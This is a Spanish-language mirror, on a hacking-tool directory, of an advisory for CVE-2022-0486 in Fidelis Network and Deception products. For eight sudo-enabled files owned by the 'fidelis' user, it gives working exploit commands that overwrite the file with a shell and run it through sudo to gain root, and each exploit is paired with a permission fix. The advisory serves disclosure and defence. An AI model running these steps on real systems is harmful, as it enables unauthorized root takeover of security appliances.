Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - Escalada de privilegios por permisos de archivos inseguros - Múltiple | Kitploit
Herramientas/GitHubGitHub/henryreed/cve-2022-0486
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - Escalada de privilegios por permisos de archivos inseguros - Múltiple

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Fidelis Network and Deception - CVE-2022-0486 - Escalación de Privilegios por Permisos de Archivo Inseguros - Múltiples

Publicación y Agradecimientos

Todos los exploits fueron aprobados para su divulgación pública por el Gobierno de los Estados Unidos. Un agradecimiento especial al personal militar y los enlaces gubernamentales encargados de aprobar la documentación para su distribución ilimitada. Por favor, consulte los siguientes números OTR:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

Metadatos

Fecha: 20220517 2005H UTC

Autor del Exploit: Henry Reed, The Aerospace Corporation

Página del Proveedor: https://fidelissecurity.com/

Versiones Afectadas:

  • Fidelis CommandPost anterior a 9.4.5
  • Fidelis Collector anterior a 9.4.5
  • Fidelis Sensor anterior a 9.4.5
  • Fidelis Sandbox anterior a 9.4.5

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

CVE: CVE-2022-0486

Descripción CVE: Los permisos de archivo inadecuados en los componentes CommandPost, Collector, Sensor y Sandbox de Fidelis Network y Deception permiten a un atacante con acceso administrativo local a la CLI modificar archivos afectados y habilitar la escalación de privilegios equivalente al usuario root. La vulnerabilidad está presente en las versiones de Fidelis Network y Deception anteriores a la 9.4.5. Hay parches y actualizaciones disponibles para solucionar esta vulnerabilidad.

Resumen Ejecutivo

Existen varios exploits bajo este CVE, ya que el CVE cubre una serie de permisos de archivo inadecuados. Todos los exploits se deben a un permiso NOPASSWD y varios permisos sudoers que requieren contraseña otorgados al usuario fidelis en binarios o scripts que el usuario fidelis posee, permitiendo por lo tanto que el usuario fidelis modifique arbitrariamente el archivo. Esto permite la escalación local de privilegios.

Archivo afectado con NOPASSWD:

  • /FSS/bin/shutdown.pl

Archivos afectados que requieren contraseña:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

Se recomienda que los usuarios afectados de Fidelis Deception o Fidelis Network actualicen su software para corregir esta vulnerabilidad. También se recomienda a todos los usuarios, independientemente de si fueron afectados por esta vulnerabilidad, deshabilitar el acceso shell a sus productos Fidelis después de la configuración inicial.

Si por alguna razón no es posible ninguna de estas opciones, en este documento se describe una mitigación para cada archivo vulnerable. Hasta donde el autor ha podido probar, parece que los usuarios necesitarán usar una de estas vulnerabilidades para escalar privilegios antes de poder aplicar las mitigaciones descritas, por lo que se recomienda encarecidamente actualizar Fidelis y deshabilitar SSH.

Escalación de Privilegios en Shutdown.pl

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/bin/shutdown.pl permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/shutdown.pl como usuario root sin solicitar contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo shutdown.pl:
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. Ejecutar el archivo usando el comando sudo:
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad. Observe la línea NOPASSWD, que indica que shutdown.pl es un candidato potencial para escalación de privilegios:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/bin/shutdown.pl a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/shutdown.pl mitigaría esta vulnerabilidad:

Escalación de Privilegios Autenticada en cert_mgmt

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/setup/cert_mgmt permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/setup/cert_mgmt como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo cert_mgmt:
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/setup/cert_mgmt a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/setup/cert_mgmt mitigaría esta vulnerabilidad:

Escalación de Privilegios Autenticada en db_updater

Probado en:

  • Fidelis CommandPost 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/bin/db_updater permiten al usuario fidelis escalar privilegios equivalentes al usuario root en Fidelis CommandPost. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/db_updater como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo db_updater:
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/bin/db_updater

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/bin/db_updater a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/db_updater mitigaría esta vulnerabilidad:

Escalación de Privilegios Autenticada en deception-manager

Probado en:

  • Fidelis CommandPost 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/deception-manager/bin/deception-manager permiten al usuario fidelis escalar privilegios equivalentes al usuario root en Fidelis CommandPost. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/deception-manager/bin/deception-manager como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.

Exploit:

  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/deception-manager/bin/deception-manager a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/deception-manager/bin/deception-manager mitigaría esta vulnerabilidad:

Escalación de Privilegios Autenticada en fssdbg.sh

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/sbin/fssdbg.sh permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/sbin/fssdbg.sh como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo fssdbg.sh:
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/sbin/fssdbg.sh a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/sbin/fssdbg.sh mitigaría esta vulnerabilidad:

Escalación de Privilegios Autenticada en mst

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/bin/mst permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/mst como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo mst:
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/bin/mst

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/bin/mst a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/mst mitigaría esta vulnerabilidad. La siguiente es una captura de pantalla mostrando la mitigación de escalación de privilegios y un fragmento de la salida del comando mst cuando se ejecuta por fidelis sin sudo:

Captura de pantalla mostrando que incluso con la mitigación, el comando aún puede ejecutarse como sudo por el usuario fidelis:

Captura de pantalla mostrando que mst no puede modificarse para ejecutar otro código arbitrario cuando se usa la mitigación:

Escalación de Privilegios Autenticada en setup

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/bin/setup permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/setup como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo setup:
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/bin/setup

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/bin/setup a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/setup mitigaría esta vulnerabilidad:

Escalación de Privilegios Autenticada en setup

Probado en:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Internal VM) Sensor 9.4.3

Resumen:

Los permisos de propiedad mal configurados en /FSS/setup/unlock_cp_user.sh permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/setup/unlock_cp_user.sh como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.

Exploit:

  1. Cambiar permisos para permitir modificación del archivo unlock_cp_user.sh:
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. Modificar el archivo según sea necesario para ejecutar código arbitrario o, en este ejemplo, abrir un shell:
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. Ejecutar el archivo usando el comando sudo y autenticarse con la contraseña del usuario fidelis:
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Mitigación:

Cambiar los propietarios de usuario y grupo de /FSS/setup/unlock_cp_user.sh a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/setup/unlock_cp_user.sh mitigaría esta vulnerabilidad:

Descargar herramienta